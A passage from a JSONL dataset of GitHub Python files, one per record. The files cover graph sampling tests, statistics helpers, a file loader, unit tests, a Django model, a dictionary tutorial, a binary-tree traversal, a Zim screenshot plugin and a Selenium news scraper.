n_nodes))\nprint(\"Using seed {}\".format(seed))\n\nnx_ER_start = time.time()\nnx_ER_list = [nx.gnp_random_graph(n_nodes,p) for k in range(n_samples)]\nnx_ER_end = time.time()\n\nprint(\"Elapsed time: {} s\".format(nx_ER_end - nx_ER_start))\nprint(\"Produced {} samples\".format(len(nx_ER_list)))\n\n\nprint(\"Now using ergmpy gibbs sampler ergm.sample_binary, same parameters\")\n\nergm_ER_start = time.time()\nergm_ER_model = ergm.ergm([np.sum],[np.log(p / (1-p))], False)\nergm_ER_samples = ergm_ER_model.sample_binary(n_nodes, n_samples)\nergm_ER_end = time.time()\n\nprint(\"Elapsed time: {} s\".format(ergm_ER_end - ergm_ER_start))\n\nergm_ER_list = [nx.from_numpy_array(ergm_ER_samples[:,:,i]) for i in range(n_samples)]\n\nprint(\"Produced {} samples\".format(len(ergm_ER_list)))\n\nprint(\"Comparing distribution of edge counts:\")\n\nm = int(binom(n_nodes, 2)) # should be 15.\nnx_edge_distro = [0.] * (m + 1) # There are between 0 and 15 (inclusive) edges in each graph\nergm_edge_distro = [0.] * (m + 1)\n\ntheory_edge_distro = [binom(m,k) * (p ** k) * ((1 - p) ** (m - k)) for k in range(m+1)]\nfor (G_nx, G_ergm) in zip(nx_ER_list, ergm_ER_list):\n nx_edge_distro[nx.number_of_edges(G_nx)] = nx_edge_distro[nx.number_of_edges(G_nx)] + 1 / n_samples\n ergm_edge_distro[nx.number_of_edges(G_ergm)] = ergm_edge_distro[nx.number_of_edges(G_ergm)] + 1 / n_samples\n\n# nx_edge_distro = [d / sum(nx_edge_distro) for d in nx_edge_distro]\n# ergm_edge_distro = [d / sum(ergm_edge_distro) for d in ergm_edge_distro]\n\nprint(\"{:>2} {:20} {:20} {:20}\".format(\"m\", \"nx prob.\", \"ergm prob.\", \"theory prob.\"))\nfor d in range(m + 1):\n print(f\"{d:2d} {nx_edge_distro[d]:20.14f} {ergm_edge_distro[d]:20.14f} {theory_edge_distro[d]:20.14f}\")\n\nn_large = 100\np_small = 0.17\nn_samples = 1000\nprint(\"Now attempting {} samples from n = {} nodes, p = {}\".format(n_samples, n_large, p_small))\n\nnx_ER_large_start = time.time()\nnx_ER_large_list = [nx.gnp_random_graph(n_large, p_small) for k in range(n_samples)]\nnx_ER_large_end = time.time()\nnx_ER_large_time = nx_ER_large_end - nx_ER_large_start\nprint(\"nx.gnp_random_graph took {} s\".format(nx_ER_large_time))\n\nnx_fastER_start = time.time()\nnx_fastER_list = [nx.fast_gnp_random_graph(n_large, p_small) for k in range(n_samples)]\nnx_fastER_end = time.time()\nnx_fastER_time = nx_fastER_end - nx_fastER_start\nprint(\"nx.fast_gnp_random_graph took {} s\".format(nx_fastER_time))\n\nergm_ER_large_start = time.time()\nergm_ER_large_model = ergm.ergm([np.sum], [np.log(p_small / (1-p_small))], directed=False)\n# ergm_ER_large_samples = ergm_ER_large_model.sample_binary(n_large,n_samples, burn_in=5*n_large, n_steps=2*n_large)\nergm_ER_large_samples = ergm_ER_large_model.sample_binary(n_large,n_samples)\nergm_ER_large_end = time.time()\nergm_ER_large_time = ergm_ER_large_end - ergm_ER_large_start\n# print(\"ergm.sample_binary took {} s with {} burnin steps and {} steps between samples\".format(ergm_ER_large_time, 5*n_large, 2*n_large))\nprint(\"ergm.sample_binary took {} s with default burn-in and steps\".format(ergm_ER_large_time))\n\nnx_ER_avg = sum([nx.number_of_edges(G) for G in nx_ER_large_list]) / n_samples\nnx_ER_fast_avg = sum([nx.number_of_edges(G) for G in nx_fastER_list]) / n_samples\nergm_ER_large_avg = sum([np.sum(ergm_ER_large_samples[:,:,k]) for k in range(n_samples)]) / n_samples\ntheory_avg = binom(n_large, 2) * p_small\n\nprint(\"Avg # of edges\")\n# print(f\"{'theory',:20}{'nx.gnp':20}{'nx.fast_gnp':20}{'ergm':20}\")\nprint(\"theory/nx.gnp/nx.fast_gnp/ergm\")\nprint(f\"{theory_avg:20.10f} {nx_ER_avg:20.10f} {nx_ER_fast_avg:20.10f} {ergm_ER_large_avg:20.10f}\")","repo_name":"celiibrendan/nx_graph_utils","sub_path":"ergmpy/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"44802902930","text":"import numpy as np\r\n\r\ndef descriptives_stats(donnee):\r\n \"\"\"\r\n Produit les statistiques descriptives a partir d'une array numpy 1D\r\n \"\"\"\r\n print(\"le nombre de donnees est de :\", len(donnee))\r\n print(\"la valeur maximale est de :\", np.max(donnee))\r\n print(\"la valeur minimale est de :\", np.min(donnee))\r\n print(\"la moyenne des donnees est de :\" , np.mean(donnee))\r\n print(\"la mediane des donnees est de :\" , np.median(donnee))\r\n print(\"l ecart-type des donnees est de :\" , np.std(donnee))\r\n first_quant = np.quantile(donnee, 0.25)\r\n print(\"le premier quantile est de :\" , first_quant)\r\n third_quant = np.quantile(donnee, 0.75)\r\n print(\"le troisieme quantile est de :\", third_quant)\r\n iqr = third_quant - first_quant\r\n print(\"l ecart interquartile est de :\", iqr)\r\n return first_quant, third_quant, iqr\r\n\r\ndef detect_outliers_iqr(donnee):\r\n \"\"\"\r\n Extrait les outliers a partir d'une array numpy 1D\r\n \"\"\"\r\n first_quant , third_quant, iqr = descriptives_stats(donnee)\r\n\r\n lower_bound = first_quant - 1.5 * iqr\r\n upper_bound = third_quant + 1.5 * iqr\r\n\r\n outliers = donnee[( donnee < lower_bound ) | (donnee > upper_bound)]\r\n\r\n ind_outliers = np.where((( donnee < lower_bound ) | (donnee > upper_bound)))\r\n\r\n data_without_outliers = donnee[( donnee >= lower_bound ) & (donnee <= upper_bound)]\r\n\r\n return outliers, data_without_outliers, ind_outliers","repo_name":"EcliaLamer/scripts_stage","sub_path":"scripts_python/fonctions_stats.py","file_name":"fonctions_stats.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2835763619","text":"import sys, os\nfrom CustomRowParser import get_formatted_row\nfrom config import allowed_quotes\nfrom config import delimiter\n#\n#\n# Pass this fileloader an absolute filepath and it will create a Hashmap of our values, stored as a list in memory\n#\n# It will validate the model which assumes we have 5 rows with the type\n# ID date-time string1 string2 string3\n#\n# Delimiter is space, and to quote strings with space we encapsulate them in before and after curly quotes “ ”, but we can tweak these in the config.py\n#\n#\n# It will then prompt the user to enter in valid IDs to list the values of st2 in the order they are in the file\n#\n#\n#\n#\n\n\n\n\n\n\n#\n#\n# Main Method\n#\n#\n\ndef main():\n\n # Memory object\n mem_obj = {}\n\n\n # make sure the filepath works\n try:\n assert os.path.exists(sys.argv[1])\n except:\n print(\"Enter in a valid Path to a file\")\n print(\"E.G. python3 fileloader.py \")\n sys.exit(1)\n filepath = sys.argv[1]\n file = open(filepath, 'r')\n\n\n # Read and process the file into memory\n print(\"Attempting to Load file %s....\" % filepath )\n bad_num_rows = 0\n for row in file:\n bad_num_rows += process_row(mem_obj, row)\n print(\"File loaded to memory!!\\n\")\n print(\"Ignored %i Rows due to Errors\" % bad_num_rows)\n file.close()\n\n\n # Begin User prompt\n current_response = ''\n while 'quit' not in current_response:\n if current_response:\n ids = current_response.split(',')\n for id in ids:\n id = id.strip()\n if id.isdigit(): ## remember this is true for only non negative integers\n get_entry(mem_obj,int(id))\n elif id =='':\n print(\"ERROR: Entry is Blank!! must be a non-negative Integer\")\n else:\n print(\"ERROR: Invalid entry for %s must be a non-negative Integer\" % id)\n\n current_response = input(\"\\nPlease enter IDs comma seperated: \")\n current_response = current_response.strip().lower()\n\n\n\n\n\n\n\n\n\n#\n#\n# Processing row functions\n#\n#\n\n\n# check to make sure we have a 5 row object with int as 1, date-time 2 and\ndef is_valid_row(parsed_row):\n\n if len(parsed_row) != 5:\n return False\n else:\n id = parsed_row[0]\n if id.isdigit(): # this also is invalid if its a negative number\n return True\n return False\n\n# returns 0 if no errors on row, returns 1 if error\ndef process_row(mem_obj, row):\n\n parsed_row = parse_row(row)\n\n if is_valid_row(parsed_row):\n add_entry(mem_obj, parsed_row)\n return 0\n else:\n return 1\n\n# this reads the rows, valid\ndef parse_row(row):\n\n #first check if there are curly braces or quotes, if not then lets just try to split it on spaces\n\n quotes_in_row = False\n for item in allowed_quotes:\n if item in row:\n quotes_in_row = True\n\n if quotes_in_row:\n split_row = get_formatted_row(row)\n else:\n split_row = row.split(delimiter)\n\n return split_row\n\n\n\n\n\n\n\n\n\n\n\n\n\n#\n#\n# Memory Object functions\n#\n#\n\n\n\n\n\n# this adds the values we want to the memory lookup object\ndef add_entry(mem_obj, row):\n id, stored_str = int(row[0]), row[3]\n if id in mem_obj.keys():\n mem_obj[id].append(stored_str)\n else:\n mem_obj[id] = [stored_str]\n# this prints the values of a given ID to the screen\ndef get_entry(mem_obj, id):\n try:\n data =mem_obj[id]\n for item in data:\n print('%s %s' % (id, item))\n except:\n print(\"ERROR: id %s does not exist\" % id)\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"mattown/edmodo","sub_path":"fileloader.py","file_name":"fileloader.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13948533082","text":"import sys\nsys.path.append(\"B:\\\\MyGit\\\\CryptoCoin\\\\solution\")\nfrom solution.Repository.OriginalDataSet.DataSet import DataSet\nfrom solution.DatSet.DataProcessor import DataProcessor\nfrom solution.Mediator.Mediator import ComputedAndDataMediator\nimport pandas as pd\nimport unittest\nfrom unittest import TestCase\nfrom unittest.mock import MagicMock\n\n\nclass DataSetUnitTests(TestCase):\n\n def setUp(self):\n self.dataProcessor = DataProcessor()\n self.filepath = '..\\\\asset\\\\3daysCoinBase.csv'\n self.df = pd.read_csv(self.filepath)\n self.mediator = ComputedAndDataMediator()\n self.sut = DataSet(self.dataProcessor, self.mediator)\n\n def test_DataSet_Integrity(self):\n mock_mediator_send= MagicMock(name='send', return_value = None)\n self.mediator.send = mock_mediator_send\n mock_processor_process = MagicMock(name = 'process', return_value = self.df)\n self.dataProcessor.process = mock_processor_process\n\n self.sut.consume(self.df)\n\n self.assertEqual(self.sut.getSize(), self.df.shape[0])\n for x,y in zip(self.sut.getColumnNames(), self.df.keys()):\n self.assertEqual(x,y)\n\n mock_mediator_send.assert_called_once()\n mock_processor_process.assert_called_once()\n\n def test_dataSet_Read(self):\n\n mock_processor_process = MagicMock(name='process', return_value=self.df)\n self.dataProcessor.process = mock_processor_process\n\n self.sut.consume(self.df)\n data = self.sut.readPartial('price')\n\n self.assertEqual(data.size,self.df.price.size)\n mock_processor_process.assert_called_once()\n\n def test_dataset_registerComputedColumn_Method(self):\n test = 'TEST1'\n self.sut.registerComputedColumn(test)\n self.assertEqual(True, test in self.sut.getComputedKeys())\n\n def test_check_consume_state_isCorrect(self):\n\n self.assertEqual(self.sut.isReadyToConsume(), True)\n self.sut.consume(self.df)\n self.assertEqual(self.sut.isReadyToConsume(), True)\n\n\n\n\nif __name__ == \"__main__\":\n unittest.main()\n \n\n\n","repo_name":"RickMu/CryptoDataArchitecture","sub_path":"unit_test/DataSetTests.py","file_name":"DataSetTests.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19202694789","text":"from . import measure\n# from ..p_utils import get_layer_metric_array\nimport torch.nn as nn\n\n\ndef get_layer_metric_array(net, metric, mode): \n metric_array = []\n\n for layer in net.modules():\n if mode=='channel' and hasattr(layer,'dont_ch_prune'):\n continue\n if isinstance(layer, nn.Conv2d) or isinstance(layer, nn.Linear):\n metric_array.append(metric(layer))\n \n return metric_array\n\n\n\n@measure('l2_norm', copy_net=False, mode='param')\ndef get_l2_norm_array(net, inputs, targets, mode, split_data=1, space='cv'):\n return get_layer_metric_array(net, lambda l: l.weight.norm(), mode=mode)\n","repo_name":"SLDGroup/survey-zero-shot-nas","sub_path":"measures/l2_norm.py","file_name":"l2_norm.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"31"} +{"seq_id":"18233864313","text":"from django.db import models\n\nclass Post(models.Model):\n user = models.ForeignKey('user.User', on_delete=models.RESTRICT)\n subject = models.CharField(max_length=200)\n content = models.TextField()\n image = models.ImageField()\n added_at = models.DateTimeField(auto_now_add=True)\n update_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n verbose_name = 'Post'\n verbose_name_plural = 'Postlar'\n index_together = (\n ('user', 'added_at'),\n ('added_at',)\n )\n\n","repo_name":"erkin7333/pyfull","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26192608769","text":"\"\"\"\n Python数据容器:字典的常用操作\n ① 新增元素:字典[\"key\"]=value,原字典有当前key则进行修改value,没有则添加新的key和value\n ② 更新元素:字典[\"key\"]=value,对字典中原有的key进行修改\n ③ 删除元素:字典.pop(key),返回指定key的value,同时字典被修改,指定的key的数据被删除\n ④ 清空元素:字典.clear(),字典被修改,元素被清空\n\"\"\"\n# # 一、新增元素:字典[\"key\"]=value\n# my_dict = {\"小樱\": 73, \"王小明\": 80, \"知世\": 92}\n# my_dict[\"艾利欧\"] = 98 # 在字典中新增一个没有的key-value值\n# print(f\"新增元素后的结果为:{my_dict}\")\n\n# # 二、更新元素:字典[\"key\"]=value\n# my_dict = {\"小樱\": 73, \"王小明\": 80, \"知世\": 92}\n# my_dict[\"知世\"] = 85 # 修改字典内已有元素的value值\n# print(f\"修改小樱成绩后的结果为:{my_dict}\")\n\n# # 三、删除元素:del 字典[\"管家仔\"] / 字典.pop(key)\n# my_dict = {\"小樱\": 73, \"王小明\": 80, \"知世\": 92, \"管家仔\": 80, \"路人\": 33}\n# del my_dict[\"管家仔\"] # 删除字典内的某个元素\n# print(f\"删除字典中“管家仔”后的结果为:{my_dict}\")\n# ele = my_dict.pop(\"路人\") # 删除字典内的某个元素\n# print(f\"删除字典中 “路人” 后的结果为:{my_dict}\")\n\n# # 四、清空元素:字典.clear()\n# my_dict = {\"小樱\": 73, \"王小明\": 80, \"知世\": 92}\n# my_dict.clear() # 清除字典中所有的元素\n# print(f\"清除my_dict字典中所有元素后的结果为:{my_dict}\")\n\n# # 五、获取全部的key:字典.keys()\n# my_dict = {\"小樱\": 73, \"王小明\": 80, \"知世\": 92}\n# key_list = my_dict.keys() # 拿到字典中所有的key\n# print(f\"获取my_dict中所有key组成的列表:{key_list}\")\n\n# # 六、遍历字典\n# my_dict = {\"小樱\": 73, \"王小明\": 80, \"知世\": 92}\n# # 6.1\n# keys = my_dict.keys() # 拿到字典中所有的key\n# for i in keys: # 遍历得到的keys\n# print(f\"1遍历my_dict的元素 {i} 的成绩为:{my_dict[i]}\")\n# # 6.2\n# for i in my_dict: # 遍历得到的keys\n# print(f\"2遍历my_dict的元素 {i} 的成绩为:{my_dict[i]}\")\n\n# # 七、统计字典内的元素数量:len(字典)\n# my_dict = {\"小樱\": 73, \"王小明\": 80, \"知世\": 92}\n# print(f\"字典my_dict的长度为{len(my_dict)}\")\n\n# 练习:对员工信息使用字典进行数据记录——循环遍历,级别为1的员工,级别上升1级,薪水增加1000元\nstaff_info = {\n \"小樱\": {\"部门\": \"科技部\", \"工资\": 3000, \"级别\": 1},\n \"王小明\": {\"部门\": \"市场部\", \"工资\": 5000, \"级别\": 2},\n \"知世\": {\"部门\": \"市场部\", \"工资\": 7000, \"级别\": 3},\n \"月\": {\"部门\": \"科技部\", \"工资\": 4000, \"级别\": 1},\n \"小可\": {\"部门\": \"市场部\", \"工资\": 6000, \"级别\": 2}\n}\nprint(f\"全体员工当前信息如下:{staff_info}\")\n\nfor name in staff_info:\n if staff_info[name][\"级别\"] == 1:\n staff_info[name][\"级别\"] += 1\n staff_info[name][\"工资\"] += 1000\n\nprint(f\"员工升值加薪后的结果:{staff_info}\")\n","repo_name":"WoHaoKun21/python","sub_path":"6第六章:python数据容器/10_Python字典的操作.py","file_name":"10_Python字典的操作.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21044564607","text":"import time\nimport logging\nimport platform\nfrom platform import os\n\nimport gtk\n\nfrom zim.plugins import PluginClass, WindowExtension, extends\nfrom zim.actions import action\nfrom zim.fs import TmpFile\nfrom zim.applications import Application, ApplicationError\nfrom zim.gui.widgets import ui_environment, Dialog, ErrorDialog\n\nlogger = logging.getLogger('zim.plugin.screenshot')\n\nPLATFORM = os.name\nif ui_environment['platform'] == 'maemo': # don't know what os.name return on maemo\n\tPLATFORM = 'maemo'\n\n\"\"\"\nTESTED:\n\t- import (imagemagick)\n\t- scrot\nUNTESTED:\n\t- boxcutter (windows, http://keepnote.org/boxcutter/)\n\t- screenshot-tool (maemo)\n\"\"\"\nCOMMAND = 'import'\nSUPPORTED_COMMANDS_BY_PLATFORM = dict([\n\t('posix', ('import', 'scrot', 'screencapture')),\n\t('nt', ('boxcutter', 'i_view32.exe', 'i_view64.exe')),\n\t('maemo', ('screenshot-tool',)),\n])\nSUPPORTED_COMMANDS = SUPPORTED_COMMANDS_BY_PLATFORM[PLATFORM]\nif len(SUPPORTED_COMMANDS):\n\tCOMMAND = SUPPORTED_COMMANDS[0] # set first available tool as default\n\n#WSL='Microsoft' in platform.uname().release;\nWSL1='Microsoft' in platform.uname()[3];\nWSL2='microsoft' in platform.uname()[2];\n\nif PLATFORM == 'posix' and ( WSL1 or WSL2 ):\n\tSUPPORTED_COMMANDS=SUPPORTED_COMMANDS+SUPPORTED_COMMANDS_BY_PLATFORM['nt']\n\nclass ScreenshotPicker(object):\n\tcmd_options = dict([\n\t\t('scrot', {\n\t\t\t'select': ('--select', '--border'),\n\t\t\t'full': ('--multidisp',),\n\t\t\t'delay': '-d',\n\t\t}),\n\t\t('import', {\n\t\t\t'select': ('-silent',),\n\t\t\t'full': ('-silent', '-window', 'root'),\n\t\t\t'delay': '-delay',\n\t\t}),\n\t\t('i_view32.exe', {\n\t\t\t'select': ('/capture=4',),\n\t\t\t'full': ('/capture=0'),\n\t\t\t'delay': None,\n\t\t\t'savePrefix': '/convert=',\n\t\t}),\n\t\t('i_view64.exe', {\n\t\t\t'select': ('/capture=4',),\n\t\t\t'full': ('/capture=0'),\n\t\t\t'delay': None,\n\t\t\t'savePrefix': '/convert=',\n\t\t}),\n\t\t('boxcutter', {\n\t\t\t'select': None,\n\t\t\t'full': ('--fullscreen',),\n\t\t\t'delay': None,\n\t\t}),\n\t\t('screencapture', {\n\t\t\t'select': ('-xs'),\n\t\t\t'full': None,\n\t\t\t'delay': None,\n\t\t}),\n\t\t('screenshot-tool', {\n\t\t\t'select': None,\n\t\t\t'full': (),\n\t\t\t'delay': '-d',\n\t\t})\n\t])\n\tcmd_default = COMMAND\n\tfinal_cmd_options = ()\n\n\tdef __init__(self, cmd, select=False, delay=0):\n\t\tcmd = self.select_cmd(cmd)\n\t\tscreenshot_mode = 'select' if select is True else 'full'\n\t\tself.final_cmd_options += self.cmd_options[cmd][screenshot_mode]\n\n\t\tif str(delay).isdigit() and int(delay) > 0 and self.cmd_options[cmd]['delay'] is not None:\n\t\t\tself.final_cmd_options += (self.cmd_options[cmd]['delay'], str(delay))\n\n\t@classmethod\n\tdef select_cmd(cls, cmd=None):\n\t\tif cmd is None or cmd not in SUPPORTED_COMMANDS or cmd not in cls.cmd_options:\n\t\t\tcmd = cls.cmd_default\n\t\treturn cmd\n\n\t@classmethod\n\tdef get_cmd_options(cls, cmd=None, select=False, delay=0):\n\t\tcmd = cls.select_cmd(cmd)\n\t\tdelay = delay if str(delay).isdigit() and int(delay) > 0 else 0\n\t\tme = cls(cmd, select, str(delay))\n\t\treturn me.final_cmd_options\n\n\t@classmethod\n\tdef has_delay_cmd(cls, cmd=None):\n\t\tcmd = cls.select_cmd(cmd)\n\t\treturn True if cls.cmd_options[cmd]['delay'] is not None else False\n\n\t@classmethod\n\tdef has_select_cmd(cls, cmd):\n\t\tcmd = cls.select_cmd(cmd)\n\t\treturn True if cls.cmd_options[cmd]['select'] is not None else False\n\n\nclass InsertScreenshotPlugin(PluginClass):\n\tplugin_info = {\n\t\t'name': _('Insert Screenshot (FASTER)'), # T: plugin name\n\t\t'description': _('''\\\nThis plugin allows taking a screenshot and directly insert it\nin a zim page without a confirmation dialog and at the impulse\nof a hot key or toolbar icon with slightly better and more descriptive\nfilenames (which can make a difference when sharing the images).\n\nThis is derived from (and is intended to replace [in operation]) a\ncore plugin that ships with zim with the same name.\n'''), # T: plugin description\n\t\t'author': 'Jaap Karssenberg',\n\t\t'help': 'Plugins:Insert Screenshot',\n\t}\n\tplugin_preferences = (\n\t\t# key, type, label, default\n\t\t('autohide', 'bool', _('Hide zim when taking a screenshot (good for small/single-monitor setups).'), False),\n\t\t('screenshot_command', 'choice', _('Screenshot Command'), COMMAND, SUPPORTED_COMMANDS), # T: plugin preference\n\t)\n\tscreenshot_cmd = COMMAND\n\n\tdef __init__(self, config=None):\n\t\tPluginClass.__init__(self, config)\n\t\tself.on_preferences_changed(self.preferences)\n\t\tself.preferences.connect('changed', self.on_preferences_changed)\n\n\tdef on_preferences_changed(self, preferences):\n\t\tself.screenshot_cmd = preferences['screenshot_command']\n\n\t@classmethod\n\tdef check_dependencies(cls):\n\t\tcmds = []\n\t\tis_ok = False\n\t\tif len(SUPPORTED_COMMANDS):\n\t\t\tfor cmd in SUPPORTED_COMMANDS:\n\t\t\t\thas_tool = Application(cmd).tryexec()\n\t\t\t\tif has_tool:\n\t\t\t\t\tis_ok = True\n\t\t\t\t\tcmds.append((cmd, True, False))\n\t\t\t\telse:\n\t\t\t\t\tcmds.append((cmd, False, False))\n\t\treturn is_ok, cmds\n\n\n@extends('MainWindow')\nclass MainWindowExtension(WindowExtension):\n\tuimanager_xml = '''\n\t\n\t\t\n\t\t\t\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\n\t\n\t'''\n\tscreenshot_command = COMMAND\n\tplugin = None\n\tpngquant = Application('pngquant')\n\tonImageInserted = Application('zim-on-image-inserted')\n\n\tdef __init__(self, plugin, window):\n\t\tWindowExtension.__init__(self, plugin, window)\n\t\tself.on_preferences_changed(plugin.preferences)\n\t\tself.connectto(plugin.preferences, 'changed', self.on_preferences_changed)\n\t\tself.plugin = plugin\n\n\tdef on_preferences_changed(self, preferences):\n\t\tif preferences['screenshot_command']:\n\t\t\tself.screenshot_command = preferences['screenshot_command']\n\n\t@action(\n\t\t_('_Screenshot...'),\n\t\tstock=gtk.STOCK_LEAVE_FULLSCREEN,\n\t\treadonly=True,\n\t\taccelerator = 'U'\n\t) # T: menu item for insert screenshot plugin\n\tdef insert_screenshot(self):\n\t\tnotebook = self.window.ui.notebook # XXX\n\t\tpage = self.window.ui.page # XXX\n\n\t\ttmpfile = TmpFile('insert-screenshot.png')\n\t\tselection_mode = True\n\t\tdelay = 0\n\n\t\t#delay = self.time_spin.get_value_as_int()\n\t\tprefix = page.name.replace(':','-')\n\n\t\toptions = ScreenshotPicker.get_cmd_options(self.screenshot_command, selection_mode, str(delay))\n\t\thelper = Application((self.screenshot_command,) + options)\n\n\t\tdef callback(status, tmpfile):\n\t\t\tif self.plugin.preferences['autohide']:\n\t\t\t\tself.window.present()\n\t\t\tif status == helper.STATUS_OK:\n\t\t\t\tname = prefix+'-'+(\"%x\" % time.time())+'.png'\n\t\t\t\timgdir = notebook.get_attachments_dir(page)\n\t\t\t\timgfile = imgdir.new_file(name)\n\t\t\t\tif self.pngquant.tryexec():\n\t\t\t\t\timgfile.parent().touch();\n\t\t\t\t\ttry:\n\t\t\t\t\t\tself.pngquant.run(('--skip-if-larger',tmpfile,'--output',imgfile,))\n\t\t\t\t\t\tif os.path.isfile(imgfile.encodedpath):\n\t\t\t\t\t\t\tlogger.info(\"png8 conversion successful\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttmpfile.rename(imgfile);\n\t\t\t\t\texcept ApplicationError as e:\n\t\t\t\t\t\t# pngquant returns 98 if the resulting file would be larger, which throws an exception\n\t\t\t\t\t\ttmpfile.rename(imgfile);\n\t\t\t\telse:\n\t\t\t\t\ttmpfile.rename(imgfile)\n\n\t\t\t\tif hasattr(self.window.ui, 'mainwindow'):\n\t\t\t\t\tpageview = self.window.ui.mainwindow.pageview\n\t\t\t\telse:\n\t\t\t\t\tpageview = self.window.pageview\n\n\t\t\t\tpageview.insert_image(imgfile, interactive=False, force=True)\n\n\t\t\t\tif self.onImageInserted.tryexec():\n\t\t\t\t\tself.onImageInserted.run((imgfile, notebook.dir, page.name));\n\t\t\t\telse:\n\t\t\t\t\tlogger.debug(\"dne: %s\"%self.onImageInserted);\n\t\t\telse:\n\t\t\t\tErrorDialog(self.window.ui,\n\t\t\t\t\t\t\t_('Some error occurred while running \"%s\"') % self.screenshot_command).run()\n\t\t\t\t# T: Error message in \"insert screenshot\" dialog, %s will be replaced by application name\n\n\t\tsavePrefix = '';\n\t\toptions=ScreenshotPicker(COMMAND).cmd_options[self.screenshot_command];\n\t\tif 'savePrefix' in options:\n\t\t\tsavePrefix = options['savePrefix'];\n\n\t\ttmpfile.dir.touch()\n\t\thelper.spawn((savePrefix+tmpfile.basename,), callback, tmpfile, tmpfile.dir)\n\n\t\tif self.plugin.preferences['autohide']:\n\t\t\tself.window.iconify()\n\n\t\treturn True\n","repo_name":"Osndok/zim-plugin-screenshot2","sub_path":"screenshot.py","file_name":"screenshot.py","file_ext":"py","file_size_in_byte":7982,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"10945624212","text":"class Node:\n def __init__(self,data):\n self.data = data\n self.left = None\n self.right = None\n\n def insert(self,data):\n if self.data is not None:\n if self.data > data:\n if self.left is None:\n self.left = Node(data)\n else:\n self.left.insert(data)\n elif self.data < data:\n if self.right is None:\n self.right = Node(data)\n else:\n self.right.insert(data)\n else:\n print(\"Already Present\")\n\n def print_tree(self):\n if self.left:\n self.left.print_tree()\n print(self.data)\n if self.right:\n self.right.print_tree()\n\ndef traversal(root,point):\n if root is None:\n return\n queue = []\n queue.append(root)\n while len(queue) != 0:\n if queue[0].data == point:\n print(queue[0].data)\n break\n print(queue[0].data)\n node = queue.pop(0)\n\n if node.left is not None:\n queue.append(node.left)\n if node.right is not None:\n queue.append(node.right)\n \n\n \ndef main():\n arr = list(map(int,input(\"Please enter the elements : \").split()))\n\n for i in range(len(arr)):\n if i == 0:\n root = Node(arr[i])\n else:\n root.insert(arr[i])\n\n #root.print_tree()\n traversal(root,15)\n \nmain()\n","repo_name":"Shikhar0907/Algo-and-data-structure-questions","sub_path":"Amazon_interview/Binary Tree/Jumping the Subtree using BSF.py","file_name":"Jumping the Subtree using BSF.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13919725696","text":"import requests\nfrom bs4 import BeautifulSoup as BS\nimport pandas as pd\nfrom selenium import * \nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport time\nfrom selenium.webdriver.common.by import By\n\n# url_Peliculas = 'https://www.starz.com/ar/es/movies'\n# url_Series = 'https://www.starz.com/ar/es/series'\n\n# pagina = requests.get(url_Peliculas)\n\n\n#url = 'https://www.starz.com/ar/es/movies' #\n#search = requests.get(url) #\n#print(f'El status es: {search.status_code}')\n\n#print(search.content)\n\n\n#soup = BS(search.content, features=\"html.parser\")\n\n#soup.prettify\n\n#\n#elements = soup.find_all(attrs = {\"class\": \"on-hover metadata-items\"})\n#print(elements)\n\n\n##################################\npath_driver = 'C:/Users/Admin/scrappers/chromedriver.exe'\nchrome_options = Options()\n#chrome_options.add_argument(\"--headless\")\n\n#\n# Creación del navegador\ndriver = webdriver.Chrome(executable_path = path_driver, options = chrome_options)\n\n\n# Visitamos la página y esperamos 5 segundos a que todo cargue bien\ndriver.get(\"https://www.lanacion.com.ar/\")\ntime.sleep(5)\n\nelements = driver.find_elements_by_class_name(\"com-title --xs\")\n\n\nfor iteration in range(6):\n driver.execute_script(\"window.scrollTo(0,document.body.scrollHeight);\")\n time.sleep(2)\n\n# Ahora guardamos los enlaces de cada elemento\nhrefs = []\nfor element in elements:\n try:\n href = element.find_elements_by_tag_name('a')\n \n hrefs.append(href)\n except:\n pass\n\n\nprint(hrefs)\n\n# # Guardamos los enlaces en un archivo\n# fp = open('links.txt','w')\n# for href in hrefs:\n# \tfp.write(href + '\\n')\n# fp.close()\n\n\ndriver.close()\ndriver.quit()\n\n\n\n\n\n\n# urls = []\n# for element in elements:\n# try:\n# urls.append(element.find('h6')['class'])\n# except:\n# pass\n\n# print(urls)\n\n# print(len(urls))\n\n# search_parseada = bs(search.content, 'html.parser') # Parseamos el contenido del request como un html\n# print(search_parseada.prettify()[:20000]) \n\n\n# tag_deptos = search_parseada.findAll(name = 'div', attrs = {'class' : 'listing__item'})\n\n# soup = BeautifulSoup(pagina.content, 'html.parser') features=\"html.parser\"\n\n# result = soup.find_all(lambda tag: tag.name == 'h6' and tag.get('class') == ['on-hover metadata-items'])\n\n\n# print(result)\n\n\n","repo_name":"Mauroemg/testScrapping","sub_path":"conDiarioLaNacion.py","file_name":"conDiarioLaNacion.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 